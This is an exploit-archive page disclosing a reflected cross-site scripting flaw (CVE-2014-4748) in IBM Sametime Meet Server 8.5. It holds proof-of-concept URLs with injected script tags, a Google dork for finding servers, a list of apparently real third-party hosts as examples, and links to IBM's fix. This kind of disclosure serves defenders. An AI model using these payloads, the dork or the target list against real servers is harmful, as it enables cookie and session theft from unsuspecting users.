exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

IBM Sametime Meet Server 8.5 Cross Site Scripting

IBM Sametime Meet Server 8.5 Cross Site Scripting
Posted Aug 11, 2014
Authored by Adriano Marcio Monteiro

IBM Sametime Meet Server version 8.5 suffers from a reflective cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2014-4748
SHA-256 | e4d190702ff79740508c84c53897a8ccfa7a8e5c69de6ea78f5f8bdead6ace27

IBM Sametime Meet Server 8.5 Cross Site Scripting

Change Mirror Download
# Exploit Title:   IBM Sametime Meet Server 8.5 Reflect Cross Site Script
# Google Dork: intitle:"Meeting Center - IBM Lotus Sametime"
# Date: 11/08/2014
# CVSS Score: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:N/AC:M/Au:N/C:P/I:N/A:N%29
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4748
# OSVDB-ID: http://osvdb.org/109444
#
# Author: Adriano Marcio Monteiro
# E-mail: adrianomarciomonteiro@gmail.com
# Blog: http://www.brazucasecurity.com.br
#
# Vendor: http://www.ibm.com
# Software: http://www.ibm.com/sametime
# Version: 8.5.1
# Advisory: https://www-304.ibm.com/support/docview.wss?uid=swg21679221
#
# Test Type: Black Box
# Tested on: Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome Versão 33.0.1750.146 m



Table of Contents

[0x00] The Vulnerability
[0x01] Exploit Description
[0x02] PoC - Proof of Concept
[0x03] Correction or Workaround
[0x04] Timeline
[0x05] Published
[0x06] References
[0x07] Bibliography



[0x00] The Vulnerabilty

Reflected Cross Site Scripting (XSS)
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page



[0x01] Description

IBM Sametime Classic Meeting Server is vulnerable to reflected cross-site scripting, caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.



[0x02] PoC - Proof of Concept
For exploit this vulnerability you only need to submit the crafted URL to victim.

http://sametime02.myserver.com.br/stconf.nsf/WebAttendFrameset?OpenAgent&view=Attend&docID=$DOCID$&meetingID=$MEETID$&join_type=mrc&subject=</title><script>alert('I am a XSS')</script><!--&userLang=pt_BR

http://sametime02.myserver.com.br/stconf.nsf/vwCalendar?OpenView&Grid="><script>alert(' I am a XSS')</script><!--&Date=2014-07-28

Examples:

http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm
http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm
http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm
http://www.azi.com.br/stconf.nsf/frmConference?OpenForm
http://aquila.sealinc.org/stconf.nsf/frmConference?Openform
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
http://comware.net/stconf.nsf/frmConference?Openform
https://236ws.dpteruel.es/stconf.nsf/frmConference?OpenForm
https://correoweb.gruposanjose.biz/stconf.nsf/frmConference?Openform
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
https://mail.dba.uz/stconf.nsf/frmConference?Openform



[0x03] Correction or Workaround

Apply the procedures described in the follow link:
http://www-01.ibm.com/support/docview.wss?uid=swg21679454



[0x04] Timeline

18/07/2014 - Vulnerabilities discovered
19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team
23/07/2014 - Advisory and troubleshooting fix published



[0x05] Published

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4748
http://www.securityfocus.com/bid/68841



[0x06] References

OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

CWE-264: Permissions, Privileges, and Access Controls
http://cwe.mitre.org/data/definitions/79.html



[0x07] Bibliography

http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent


[end]
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close